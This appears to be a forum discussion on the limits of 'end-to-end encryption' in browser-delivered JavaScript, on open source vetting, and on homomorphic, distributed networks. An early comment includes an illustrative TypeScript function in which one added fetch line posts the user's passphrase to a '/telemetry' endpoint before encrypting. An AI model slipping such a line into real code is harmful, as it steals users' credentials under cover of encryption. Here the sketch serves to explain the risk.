If you aren't doing the encryption yourself, you aren't using end-to-end encryption. People need to realize this and stop implicitly trusting companies just because they say they end-to-end encrypt something. The industry has partially redefined "end-to-end encryption" to include things that are merely transport-encrypted the whole way, which still gives the central servers access to the data, even if they don't log it. And if they can theoretically read the data, they can be compelled to hand it over under CALEA (the Communications Assistance for Law Enforcement Act) in the US, and under other laws abroad. Note that this also applies to web-based "locally encrypted" services built on Javascript, such as bitcoin wallets, cloud-based password managers, Mega, and things like Google's described attempt at end-to-end encrypted email. The Javascript may execute on your client rather than on the server, but it is still served to you by the server. That means a one-time insertion of a few lines of code that log your password and send it home, deployed only to selected users, is all it takes for them to retrieve your password. Unless you review every piece of Javascript executing on your client, every single time it runs, you can never fully ensure this isn't happening on any of these services.
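To make that concrete, here's a hypothetical sketch (in TypeScript) of what a quietly trojaned "client-side encryption" script could look like. The names here (encryptVault, /telemetry) are invented for illustration and don't come from any real service; the point is that one added line defeats everything the legitimate crypto below it does:

```typescript
// Hypothetical sketch of a trojaned client-side encryption function.
// Everything except the marked line is the code the user expects to run.
async function encryptVault(passphrase: string, vault: Uint8Array): Promise<Uint8Array> {
  // The one line an attacker needs: ship the passphrase home before
  // encrypting. (Endpoint name is invented for this example.)
  void fetch("/telemetry", { method: "POST", body: passphrase });

  // Legitimate client-side encryption: PBKDF2 key derivation + AES-GCM.
  const salt = crypto.getRandomValues(new Uint8Array(16));
  const keyMaterial = await crypto.subtle.importKey(
    "raw", new TextEncoder().encode(passphrase), "PBKDF2", false, ["deriveKey"]);
  const key = await crypto.subtle.deriveKey(
    { name: "PBKDF2", salt, iterations: 600_000, hash: "SHA-256" },
    keyMaterial, { name: "AES-GCM", length: 256 }, false, ["encrypt"]);
  const iv = crypto.getRandomValues(new Uint8Array(12));
  const ciphertext = await crypto.subtle.encrypt({ name: "AES-GCM", iv }, key, vault);

  // Pack salt + iv + ciphertext for storage on the server.
  const out = new Uint8Array(salt.length + iv.length + ciphertext.byteLength);
  out.set(salt, 0);
  out.set(iv, salt.length);
  out.set(new Uint8Array(ciphertext), salt.length + iv.length);
  return out;
}
```

Served to a fraction of users for a single session, a change like this is effectively invisible to anyone auditing the service from outside.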
Which is why we need open source tools that are vetted by the community. No one can actually track everything that runs in their browser, so the best we can do is outsource that review to people we trust.
Sort of. Even if the product is open source, the installed copy of that source can be modified to include malware or injected Javascript. Even if the service provides a way to "view" the code currently executing on the server, that viewer itself could filter out the exploit code. On top of that, if the code runs on a remote server, any amount of other software could simultaneously be reading the process's memory, the database, and so on. So what would be effective is open source tools that run on your own machine and are distributed and vetted by a third party, which is the entire design of the Linux operating system and distribution-based package management. It does have problems with mass storage, though.

This tends to be why so many security people are researching distributed systems and homomorphic encryption. If we reach the point where we can execute code without knowing what code we are executing, or what data a particular individual is accessing, we can effectively remove the service providers (the man in the middle) from the equation. Unfortunately, everyone still thinks the cloud is going to save their lives and solve their problems, and for now the convenience of backups, and of testing and developing small codebases on cloud platforms, makes it much easier to try out an idea and build popularity there. Right now it takes a ton of work to create your own distributed system, so the next step after homomorphic encryption is standardized is building platforms for using it. The next step in distributed systems is a method or platform that lets one network run many services, rather than current systems like BitTorrent and Bitcoin, which each really run one concept. People hijack the blockchain to do other things, but those are hacks layered on top of the Bitcoin protocol; it was not designed to support multiple projects.

Freenet is a great example of what can be done (encrypted, distributed content), but it has a couple of major flaws. First, it's insanely slow, so speed is an issue that needs to be solved. Second, there is no distribution of processing; it's content only. A homomorphic-encryption version of Freenet would be an interesting platform to see. Freenet also illustrates the limitations of such entirely closed-off designs. Right now its only resource cost is storage space, since it is essentially just distributed content storage. An enhanced version with processing would also have to reserve CPU time on your machine for calculations you know nothing about. That is easily abusable by dipshits, and dipshits will always exist: the network could be taken down, or slowed significantly, by a spammer who just computes "1+1" over and over and over again. I don't know if that problem is solvable directly, since you effectively don't know what's being executed, so how could you know what processing to filter? So a combination would have to come into play. An adaptation of Bitcoin could monetize your processing and require payment to run a process. The processor could even be paid as if it had just mined a Bitcoin, and that payment would need to be verifiable, which could require two simultaneous networks: one for processing and one for verification. This would reduce the effectiveness of spam on the network.
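As a rough sketch of that pay-to-compute idea, assuming a hypothetical job format and stubbed-out networks (Job, verifyPayment, and runOpaqueJob are all invented names here, not any real protocol), a processing node's gatekeeping logic might look something like this:

```typescript
// Minimal sketch of the "pay to run a process" anti-spam idea.
interface Job {
  ciphertextProgram: Uint8Array; // homomorphically encrypted: the node can't read it
  paymentTxId: string;           // reference into the separate verification network
  feeOffered: number;            // price offered per unit of CPU time
}

// The node never learns what it is running; it only checks that the
// submitter paid, which is what prices out "1+1" spam loops.
async function maybeProcess(job: Job, minFee: number): Promise<Uint8Array | null> {
  if (job.feeOffered < minFee) return null;                           // below market rate, skip
  const paid = await verifyPayment(job.paymentTxId, job.feeOffered);  // ask the verification network
  if (!paid) return null;                                             // no confirmed payment, no CPU
  return runOpaqueJob(job.ciphertextProgram);                         // execute blind, get paid
}

// Placeholder stubs standing in for the two networks; a real node would
// query the verification chain and a homomorphic-encryption runtime.
async function verifyPayment(txId: string, amount: number): Promise<boolean> {
  return txId.length > 0 && amount > 0; // placeholder check only
}
async function runOpaqueJob(program: Uint8Array): Promise<Uint8Array> {
  return program; // placeholder: a real node would evaluate the ciphertext
}
```

The design point is that the fee check and the payment verification happen before any cycles are spent, so spam costs the spammer real money instead of costing the network free CPU.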
There are two major problems with this system, though. First, you would effectively be providing a generic service that processes anything for anyone who pays. The major media moguls could easily pump 0.1% of their profits into spamming networks like these, since it would effectively slow the network down and would probably be legal to do. Even if it were made illegal, they could disguise their processing as analytical work they supposedly want run on the network but don't actually care about. Second, even in the ideal world where mass adoption of these protocols has eliminated those media moguls and migrated 99% of the internet over, the processing overhead of administering such a system would be considerable. Ordinary processing (the way we do it now) would be the easy way to market "superdeeduperfastspeeds", and most people would buy into that because, guess what, it would be legitimately faster. The network then starts to erode back toward those systems, which make enough profit to funnel money into slowing the mesh system down again. I love researching these systems, but getting them to take hold is difficult in practice. Bitcoin is clearly here to stay, which is good, but so far I can only imagine small applications like it, with low bandwidth and processing requirements, taking hold; massive database systems inside such an encrypted, closed-off network would just tank it. So if someone can solve the massive security problems of encrypted homomorphic mesh networks, that would make them an enhanced robotic Satoshi Nakamoto-level researcher. Then again, with AI getting out there, we might actually be able to build an AI system that solves this problem for us: not a "thinking" AI, but a system that uses learning techniques to solve a narrow, specific security goal. The state of the internet and its protocols over the next 20 years is going to be fascinating to watch.
That's good to know - both that Mega isn't safe and that Kim Dotcom will always have our backs.